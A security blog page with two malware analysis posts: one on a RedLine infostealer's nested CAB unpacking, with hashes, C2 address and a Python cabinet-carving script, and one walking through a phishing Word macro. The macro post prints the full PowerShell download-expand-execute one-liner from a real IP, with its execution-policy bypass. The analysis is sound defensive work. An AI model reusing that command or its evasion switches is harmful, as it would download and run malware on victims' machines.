Showing posts with label CAB. Show all posts

Thursday, February 16, 2023

Redline Malware Analysis Feb 16 2023

Started with this redline malware sample 

https://www.joesandbox.com/analysis/808971/0/html

The sandbox report shows it spawning a chain of child processes and eventually dropping these 2 payloads:

AV killer

https://www.virustotal.com/gui/file/850cd190aaeebcf1505674d97f51756f325e650320eaf76785d954223a9bee38

Healer.exe

MD5 7e93bacbbc33e6652e147e7fe07572a0

SHA-1 421a7167da01c8da4dc4d5234ca3dd84e319e762



Infostealer

https://www.virustotal.com/gui/file/dc28c9d9ab3f30222ed59f3991c5981bec40604e725ece488d8599eef917a7b3 

The infostealer looks a lot like the one analyzed in this blog post ( https://securityscorecard.com/research/detailed-analysis-redline-stealer/ )

Franchise.exe

MD5 dd0c9e110c68ce1fa5308979ef718f7b

SHA-1 473deb8069f0841d47b74b7f414dacc6f96eca78


C2: 193.233.20.13:4136


It is stored in a self-extracting .CAB file (Microsoft Cabinet).

It actually unpacks itself 4 times before we finally see the payload.

Each time the child .CAB file is stored in a resource named "CABINET".

Each time there are 2 .exes inside the .CAB.

In each of the repeated unpacks, the "RUNPROGRAM" resource launches another child .CAB extractor.

Eventually though, on the last extract, it's 2 .NET executables instead of an x86 .CAB extractor.



The first .NET executable is an AV killer that turns off Defender, Windows Update, etc.



The 2nd .NET executable is the infostealer that grabs wallets, VPN and Discord data, and much more.


There are some Russian characters and the names of countries in the surrounding region.



There is also code for the C2 (command and control) traffic, which is XOR'd with the key "Sigma" and base64 encoded. C2: 193.233.20.13:4136

CAB files: FDICreate / FDICopy

 call ds:__imp__FDICreate (creates an FDI context for extracting Microsoft .CAB Cabinet files)

...

push offset pszCabPath

call ds:__imp__FDICopy

In memory you should see the Cabinet archive, recognized by its first four bytes (its magic number): MSCF.

After the FDICopy call you'll see the extracted files (possibly .exe malware) in the directory that was passed as pszCabPath. Strictly, pszCabPath is the directory FDICopy loads the cabinet from; where each member is written is decided by the extractor's FDI notification callback (the fdintCOPY_FILE notification), so if the files are not there, look at the CreateFile calls made from that callback.
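The nested layering above (a cabinet inside a resource inside an extractor, four levels deep) and the MSCF magic mentioned under FDICopy are easy to work through with a small carving script. The following Python is an added example, not code from the post or from the malware: it parses the CFHEADER, CFFOLDER and CFFILE tables of every MSCF blob it finds in a byte buffer, lists the member names, extracts uncompressed folders, and recurses into each member so a four-deep chain is walked in one pass. The sample it runs on is constructed inside the script by build_cab (a four-level chain of uncompressed cabinets; the names Healer.exe and Franchise.exe come from the post, while setup.exe, runme.exe and the stub PE bytes are made up). Real self-extractor cabinets are usually MSZIP or LZX compressed, which the script reports but does not decompress; for those, feed the carved blob to a library such as libmspack or cabextract.

```python
# Added example (not from the post): carve MSCF cabinets out of a byte buffer, list
# their members, and recurse into uncompressed members to walk a nested extractor chain.
import struct

CAB_MAGIC = b"MSCF"
CFHEADER = struct.Struct("<4sIIIIIBBHHHHH")  # 36-byte fixed part of CFHEADER
CFFOLDER = struct.Struct("<IHH")             # coffCabStart, cCFData, typeCompress
CFFILE = struct.Struct("<IIHHHH")            # cbFile, uoffFolderStart, iFolder, date, time, attribs
CFDATA = struct.Struct("<IHH")               # csum, cbData, cbUncomp
COMPRESSION = {0: "none", 1: "MSZIP", 2: "Quantum", 3: "LZX"}

def _cstr(buf, off):
    end = buf.index(b"\0", off)
    return buf[off:end].decode("latin-1"), end + 1

def parse_cab(buf, base=0):
    """Parse the cabinet at buf[base:]; files are (name, size, offset-in-folder, folder-index)."""
    (sig, _, cb_cab, _, coff_files, _, _vmin, _vmaj, n_folders, n_files,
     flags, _set_id, _i_cab) = CFHEADER.unpack_from(buf, base)
    if sig != CAB_MAGIC:
        raise ValueError("not a cabinet header")
    off, folder_reserve, data_reserve = base + CFHEADER.size, 0, 0
    if flags & 0x0004:                                   # cfhdrRESERVE_PRESENT (e.g. signed cabs)
        hdr_reserve, folder_reserve, data_reserve = struct.unpack_from("<HBB", buf, off)
        off += 4 + hdr_reserve
    for _ in range(2 * bool(flags & 0x0001) + 2 * bool(flags & 0x0002)):
        _, off = _cstr(buf, off)                         # prev/next cabinet and disk names
    folders = []
    for _ in range(n_folders):
        coff_start, n_blocks, ctype = CFFOLDER.unpack_from(buf, off)
        folders.append((base + coff_start, n_blocks, ctype & 0x000F))  # absolute offset
        off += CFFOLDER.size + folder_reserve
    files, off = [], base + coff_files
    for _ in range(n_files):
        size, uoff, i_folder, _d, _t, _a = CFFILE.unpack_from(buf, off)
        name, off = _cstr(buf, off + CFFILE.size)
        files.append((name, size, uoff, i_folder))
    return {"base": base, "size": cb_cab, "folders": folders, "files": files,
            "data_reserve": data_reserve}

def _folder_bytes(buf, cab, i_folder):
    """Concatenate the CFDATA blocks of one folder (uncompressed folders only)."""
    start, n_blocks, ctype = cab["folders"][i_folder]
    if ctype != 0:
        raise NotImplementedError(f"{COMPRESSION.get(ctype, ctype)} folder not handled here")
    out, off = bytearray(), start
    for _ in range(n_blocks):
        _csum, cb_data, _cb_uncomp = CFDATA.unpack_from(buf, off)
        off += CFDATA.size + cab["data_reserve"]
        out += buf[off:off + cb_data]
        off += cb_data
    return bytes(out)

def extract(buf, cab):
    """Return {member name: bytes} for a parsed cabinet (re-reads the folder per file)."""
    return {name: _folder_bytes(buf, cab, i)[uoff:uoff + size] for name, size, uoff, i in cab["files"]}

def carve_cabs(buf, depth=0, max_depth=8):
    """Record (depth, offset, compression, member names) for every cabinet found in buf,
    recursing into members so a chain of nested extractors is walked in one pass."""
    found, pos = [], buf.find(CAB_MAGIC)
    while pos != -1:
        try:
            cab = parse_cab(buf, pos)
        except (ValueError, struct.error, IndexError):   # stray "MSCF" bytes: keep scanning
            pos = buf.find(CAB_MAGIC, pos + 4)
            continue
        comp = COMPRESSION.get(cab["folders"][0][2], "?") if cab["folders"] else "?"
        found.append((depth, pos, comp, [f[0] for f in cab["files"]]))
        try:
            members = extract(buf, cab) if depth < max_depth else {}
        except (NotImplementedError, IndexError, struct.error):
            members = {}                                 # compressed or spanned: listed, not descended
        for data in members.values():
            found.extend(carve_cabs(data, depth + 1, max_depth))
        pos = buf.find(CAB_MAGIC, pos + max(cab["size"], 4))  # skip past this cabinet's body
    return found

def build_cab(members):
    """Build a single-folder, uncompressed cabinet from {name: bytes}. Constructed test data."""
    cffiles, payload = b"", b""
    for name, data in members.items():
        cffiles += CFFILE.pack(len(data), len(payload), 0, 0, 0, 0x20) + name.encode("latin-1") + b"\0"
        payload += data
    coff_files = CFHEADER.size + CFFOLDER.size
    coff_data = coff_files + len(cffiles)
    chunks = [payload[i:i + 0x8000] for i in range(0, len(payload), 0x8000)]  # CFDATA <= 32 KiB
    blocks = b"".join(CFDATA.pack(0, len(c), len(c)) + c for c in chunks)
    header = CFHEADER.pack(CAB_MAGIC, 0, coff_data + len(blocks), 0, coff_files, 0,
                           3, 1, 1, len(members), 0, 0x1234, 0)
    return header + CFFOLDER.pack(coff_data, len(chunks), 0) + cffiles + blocks

FAKE_PE = b"MZ\x90\x00" + b"\x00" * 60   # made-up stand-in for an executable (contains no MSCF)

def build_chain(levels=4):
    """Constructed stand-in for the sample: innermost cab = the two payload exes; each outer
    cab = a made-up 'extractor' exe with the child cab embedded (the CABINET resource) plus a
    second exe."""
    cab = build_cab({"Healer.exe": FAKE_PE, "Franchise.exe": FAKE_PE})
    for _ in range(levels):
        cab = build_cab({"setup.exe": FAKE_PE + cab, "runme.exe": FAKE_PE})
    return cab
```

To use it on a real sample, read the extractor's .rsrc section or a process memory dump into a bytes object and call carve_cabs on it; each tuple gives the depth, the offset of the MSCF header, the compression type and the member names, which is exactly the "2 .exes per layer" picture from the post. Because carve_cabs skips past cbCabinet once a header parses, a cabinet that physically sits inside another cabinet's data is reported once, at the depth where it is extracted, rather than twice.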

Monday, March 16, 2015

Talking Thru some Malware in a Microsoft Word VBA Macro

There was this phishy email

From: Forrest Chavez Carmella.7b@lepau.com
Subject: Outstanding invoices - 122680 January
Attachment: 122680.doc (MD5 Checksum cbfb453c2c43951ecbefc4eb6c20fb7f)


I posted a few more details here. Just by looking at the sender (somebody I never knew, a domain name I've never heard of) I shouldn't have opened it. The subject is trying to play on my emotions and get me upset that I have an open invoice, but I should know better, realize it's just a trick, and never open it. Also the attachment is terribly named, with some ugly numbers, which should make me cautious as well.

But anyway, let's say I'm stupid and opened this phish. I thought I'd walk through what it is attempting to do. Inside the Word document there is a VBA (Visual Basic for Applications) macro. If you have macros enabled, or click to run the macro, then you become the victim.

cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('hxxp://62.76.41.15/asalt/assa.exe','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;


  • 1.) First you'll see ...

    cmd /K powershell.exe -ExecutionPolicy bypass -noprofile XXXXXXXCODEXXXXXXXX

        A.) 'cmd' is your friendly command prompt

        B.) '/K' is a parameter telling 'cmd' to run the command that follows and keep the prompt open after it finishes. Everything after 'powershell.exe' is handed to PowerShell as its command, so the ';'-separated pieces further along are PowerShell statements, not cmd commands; the '%TEMP%' references, on the other hand, are cmd syntax and get expanded by 'cmd' before PowerShell ever starts.

        C.) 'powershell.exe' is the command to run. PowerShell is your IT administrator's powerful little scripting shell, which can do anything the user interface can do, but in a scripted fashion.

        D.) '-ExecutionPolicy bypass' is used because PowerShell's execution policy normally stops users from running script files, and this switch turns it off for this one process. The execution policy is not a security boundary, though: it only governs script files, and this inline command isn't one, so the switch is mostly belt and braces here.

        E.) '-noprofile' skips the PowerShell profile scripts, the per-machine and per-user startup scripts that your company may use to set up logging, tooling or the environment. Using '-noprofile' says just run my one evil command without anything else running first (and without anything in the profile seeing it).

        F.) Finally we get to the code, which I abbreviated as XXXXXXXCODEXXXXXXXX, but I have more detail below in #2

  • 2.) Second you'll see the PowerShell code that tries to download the payload

    (New-Object System.Net.WebClient).DownloadFile('hxxp://62.76.41.15/asalt/assa.exe','%TEMP%\JIOiodfhioIH.cab')

        A.) '(New-Object System.Net.WebClient)' is the equivalent, in a high-level programming language, of declaring a new object such as WebClient c = new WebClient(). You are creating a powerful object that can connect to the internet and perform HTTP operations.

        B.) '.DownloadFile(XXXURLXXX, XXXXLOCATIONXXXXX)' is a method on that WebClient object that makes downloading and saving a file as trivial as passing in the URL ( XXXURLXXX ) and the save location ( XXXXLOCATIONXXXXX ). The URL in this case ( hxxp://62.76.41.15/asalt/assa.exe ) serves the payload, the actual malware. This could be anything from a keylogger to ransomware. It's saved to '%TEMP%\JIOiodfhioIH.cab', so the user's Temp folder, as a normal-looking '.cab' file (a format generally used for things like Windows updates). Note the mismatch: the URL ends in .exe while the file on disk ends in .cab; the next step tells you what the bytes really are, since 'expand' only works on a genuine cabinet or compressed file, whatever name it was served under.

  • 3.) Third you'll see a command trying to extract the contents of the CAB file

    'expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe;'

        A.) 'expand' is another Windows command, expand.exe, which extracts the contents of a CAB file (CAB files are kind of like ZIP files). Here it is run by PowerShell rather than 'cmd', since it sits inside the PowerShell command. Because expand.exe is a signed, built-in Windows binary, this step looks like ordinary system activity to anything that only watches for unknown executables.

  • 4.) Fourth and finally you'll see a command trying to execute an EXE

    'start %TEMP%\JIOiodfhioIH.exe;'

        A.) 'start' here is PowerShell's alias for Start-Process, run against the 'exe' that came out of the CAB file. If this command succeeds, the malware is running and you're likely infected.


So in summary 1.) Get a phishy email 2.) Open the Word Doc 3.) The malicious VBA Macro runs inside 4.) It uses powershell to download a CAB file 5.) It uses 'expand' to extract the malware from the CAB file 6.) It uses 'start' to run the malware.
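To show how a responder would pull the stages and IOCs out of a one-liner like this without running it, here is an added Python example (not code from the post). It matches the download, expand and start stages with regexes, notes the evasion switches, and returns the URL and the dropped paths. Both sample command lines in it are constructed: the first is the macro's command from above, the second a benign PowerShell command that should come out clean. Real-world variants use other download primitives (Invoke-WebRequest, BITS, certutil) that this example does not cover.

```python
# Added example (not from the post): triage a "download cab -> expand -> start" one-liner.
import re

# Constructed samples: the first is the macro's one-liner from above, the second a benign
# admin command that must not be reported as a dropper chain.
SAMPLES = [
    "cmd /K powershell.exe -ExecutionPolicy bypass -noprofile "
    "(New-Object System.Net.WebClient).DownloadFile('hxxp://62.76.41.15/asalt/assa.exe',"
    "'%TEMP%\\JIOiodfhioIH.cab'); expand %TEMP%\\JIOiodfhioIH.cab %TEMP%\\JIOiodfhioIH.exe; "
    "start %TEMP%\\JIOiodfhioIH.exe;",
    "powershell.exe -noprofile Get-Service | Where-Object Status -eq Running",
]

# One regex per stage of the chain the post walks through.
DOWNLOAD = re.compile(r"DownloadFile\(\s*'([^']+)'\s*,\s*'([^']+)'\s*\)", re.I)
EXPAND = re.compile(r"\bexpand\s+([^\s;]+)\s+([^\s;]+)", re.I)
START = re.compile(r"\bstart\s+([^\s;]+)", re.I)
# PowerShell accepts abbreviated switches (-ep, -exec, -nop, -w), so match on prefixes.
BYPASS = re.compile(r"-e[px]\w*\s+bypass", re.I)
NOPROFILE = re.compile(r"-nop\w*", re.I)
HIDDEN = re.compile(r"-w\w*\s+hidden", re.I)


def _ext(path):
    return path.lower().rsplit(".", 1)[-1] if "." in path else ""


def triage_cmdline(cmd):
    """Describe one command line: evasion switches, stages in the order they run,
    and the URLs and file paths a responder would block or hunt for."""
    flags = {
        "execution_policy_bypass": bool(BYPASS.search(cmd)),
        "noprofile": bool(NOPROFILE.search(cmd)),
        "hidden_window": bool(HIDDEN.search(cmd)),
        "payload_extension_mismatch": False,
    }
    events, urls, files = [], [], set()
    for m in DOWNLOAD.finditer(cmd):
        url, dest = m.groups()
        events.append((m.start(), "download"))
        urls.append(url)
        files.add(dest)
        if _ext(url) != _ext(dest):          # e.g. assa.exe saved under a .cab name
            flags["payload_extension_mismatch"] = True
    for m in EXPAND.finditer(cmd):
        events.append((m.start(), "expand"))
        files.update(m.groups())
    for m in START.finditer(cmd):
        events.append((m.start(), "execute"))
        files.add(m.group(1))
    stages = [name for _, name in sorted(events)]   # in the order they appear on the line
    if "download" in stages and "execute" in stages:
        verdict = "dropper_chain"
    elif stages or flags["execution_policy_bypass"]:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"verdict": verdict, "flags": flags, "stages": stages,
            "iocs": {"urls": urls, "files": sorted(files)}}


if __name__ == "__main__":
    for cmd in SAMPLES:
        print(triage_cmdline(cmd))
```

Run against the macro's command it reports a dropper_chain with the three stages in order, the download URL, the two %TEMP% paths, and the .exe-served-as-.cab mismatch; the benign command reports clean even though it also uses -noprofile, which on its own is common in legitimate scheduled tasks.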

Boom, you're infected! If you want to prevent this, a good start would be not opening such evilly suspicious-looking emails (and, on the admin side, blocking macros in Office files that came from the internet by policy) :-)

Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.